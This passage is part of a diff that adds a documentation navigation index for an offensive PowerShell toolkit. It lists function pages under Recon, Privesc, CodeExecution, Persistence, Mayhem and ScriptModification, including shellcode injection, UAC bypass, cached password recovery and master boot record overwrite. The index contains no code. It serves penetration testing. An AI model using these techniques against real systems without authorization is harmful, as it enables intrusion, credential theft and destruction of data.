+        - Get-RegLoggedOn: 'Recon/Get-RegLoggedOn.md'
+        - Get-NetRDPSession: 'Recon/Get-NetRDPSession.md'
+        - Test-AdminAccess: 'Recon/Test-AdminAccess.md'
+        - Get-NetComputerSiteName: 'Recon/Get-NetComputerSiteName.md'
+        - Get-WMIRegProxy: 'Recon/Get-WMIRegProxy.md'
+        - Get-WMIRegLastLoggedOn: 'Recon/Get-WMIRegLastLoggedOn.md'
+        - Get-WMIRegCachedRDPConnection: 'Recon/Get-WMIRegCachedRDPConnection.md'
+        - Get-WMIRegMountedDrive: 'Recon/Get-WMIRegMountedDrive.md'
+        - Get-WMIProcess: 'Recon/Get-WMIProcess.md'
+        - Find-InterestingFile: 'Recon/Find-InterestingFile.md'
+        - Find-DomainUserLocation: 'Recon/Find-DomainUserLocation.md'
+        - Find-DomainProcess: 'Recon/Find-DomainProcess.md'
+        - Find-DomainUserEvent: 'Recon/Find-DomainUserEvent.md'
+        - Find-DomainShare: 'Recon/Find-DomainShare.md'
+        - Find-InterestingDomainShareFile: 'Recon/Find-InterestingDomainShareFile.md'
+        - Find-LocalAdminAccess: 'Recon/Find-LocalAdminAccess.md'
+        - Find-DomainLocalGroupMember: 'Recon/Find-DomainLocalGroupMember.md'
+        - Get-DomainTrust: 'Recon/Get-DomainTrust.md'
+        - Get-ForestTrust: 'Recon/Get-ForestTrust.md'
+        - Get-DomainForeignUser: 'Recon/Get-DomainForeignUser.md'
+        - Get-DomainForeignGroupMember: 'Recon/Get-DomainForeignGroupMember.md'
+        - Get-DomainTrustMapping: 'Recon/Get-DomainTrustMapping.md'
+        - Get-ComputerDetail: 'Recon/Get-ComputerDetail.md'
+        - Get-HttpStatus: 'Recon/Get-HttpStatus.md'
+        - Invoke-Portscan: 'Recon/Invoke-Portscan.md'
+        - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md'
+- Privesc:
+    - About: 'Privesc/index.md'
+    - Functions:
+        - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md'
+        - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md'
+        - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md'
+        - Enable-Privilege: 'Privesc/Enable-Privilege.md'
+        - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md'
+        - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md'
+        - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md'
+        - Get-UnquotedService: 'Privesc/Get-UnquotedService.md'
+        - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md'
+        - Get-ModifiableService: 'Privesc/Get-ModifiableService.md'
+        - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md'
+        - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md'
+        - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md'
+        - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md'
+        - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md'
+        - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md'
+        - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md'
+        - Write-HijackDll: 'Privesc/Write-HijackDll.md'
+        - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md'
+        - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md'
+        - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md'
+        - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md'
+        - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md'
+        - Get-WebConfig: 'Privesc/Get-WebConfig.md'
+        - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md'
+        - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md'
+        - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md'
+        - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md'
+        - Invoke-WScriptUACBypass: 'Privesc/Invoke-WScriptUACBypass.md'
+        - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md'
+        - Get-System: 'Privesc/Get-System.md'
+- AntiVirus:
+    - Functions:
+        - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
+- CodeExecution:
+    - Functions:
+        - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
+        - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
+        - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
+        - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
+- Mayhem:
+    - Functions:
+        - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
+        - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'
+- Persistence:
+    - Functions:
+        - New-ElevatedPersistenceOption: 'Persistence/New-ElevatedPersistenceOption.md'
+        - New-UserPersistenceOption: 'Persistence/New-UserPersistenceOption.md'
+        - Add-Persistence: 'Persistence/Add-Persistence.md'
+        - Install-SSP: 'Persistence/Install-SSP.md'
+        - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md'
+- ScriptModification:
+    - Functions:
+        - Out-CompressedDll: 'ScriptModification/Out-CompressedDll.md'
+        - Out-EncodedCommand: 'ScriptModification/Out-EncodedCommand.md'
+        - Out-EncryptedScript: 'ScriptModification/Out-EncryptedScript.md'
+        - Remove-Comment: 'ScriptModification/Remove-Comment.md'